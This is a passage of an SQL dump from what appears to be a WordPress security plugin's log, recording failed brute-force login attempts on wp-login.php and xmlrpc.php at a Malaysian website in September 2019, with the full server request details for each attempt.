19:17:24',18259176,19556640,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.180.123'),(24238,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"42340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-iMmShanGhHYaqyCSwkQAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568662066.3659\";s:12:\"REQUEST_TIME\";s:10:\"1568662066\";}}','notice','2019-09-16 19:27:47','2019-09-16 19:27:46',17740856,19230768,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24239,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"42776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-iNWkPXSyJlCUJQmohngAAAYs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568662069.4357\";s:12:\"REQUEST_TIME\";s:10:\"1568662069\";}}','notice','2019-09-16 19:27:50','2019-09-16 19:27:49',18260416,19558048,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24240,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"37758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-jT9K-omY048@iBsMSswAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568662351.6905\";s:12:\"REQUEST_TIME\";s:10:\"1568662351\";}}','notice','2019-09-16 19:32:33','2019-09-16 19:32:32',17740912,19231272,'https://bintara.com.my/wp-login.php',1,0,'149.202.95.126'),(24241,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"38720\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-jUmShanGhHYaqyCSx8gAAAAY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568662354.6292\";s:12:\"REQUEST_TIME\";s:10:\"1568662354\";}}','notice','2019-09-16 19:32:36','2019-09-16 19:32:34',18259992,19556608,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.95.126'),(24600,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"59260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDz0UViJhUiKk@yAoenEQAAAYI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732113.4466\";s:12:\"REQUEST_TIME\";s:10:\"1568732113\";}}','notice','2019-09-17 14:55:14','2019-09-17 14:55:13',17739880,19231376,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(24599,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"45182\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDzrEViJhUiKk@yAoenAQAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732076.2122\";s:12:\"REQUEST_TIME\";s:10:\"1568732076\";}}','notice','2019-09-17 14:54:37','2019-09-17 14:54:36',18255992,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'176.9.74.214'),(24598,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"44651\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDzqfgg4cIpXyxKa54z0gAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568732073.288\";s:12:\"REQUEST_TIME\";s:10:\"1568732073\";}}','notice','2019-09-17 14:54:34','2019-09-17 14:54:33',17740024,19231120,'https://bintara.com.my/wp-login.php',1,0,'176.9.74.214'),(24597,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.226.184\";s:11:\"REMOTE_PORT\";s:5:\"58282\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDyNH-mRYMgL5SYt2EHTQAAAUc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731700.3427\";s:12:\"REQUEST_TIME\";s:10:\"1568731700\";}}','notice','2019-09-17 14:48:21','2019-09-17 14:48:20',18257080,19556672,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.226.184'),(24596,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.226.184\";s:11:\"REMOTE_PORT\";s:5:\"57662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDyMUViJhUiKk@yAoemMgAAAYU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731697.4528\";s:12:\"REQUEST_TIME\";s:10:\"1568731697\";}}','notice','2019-09-17 14:48:18','2019-09-17 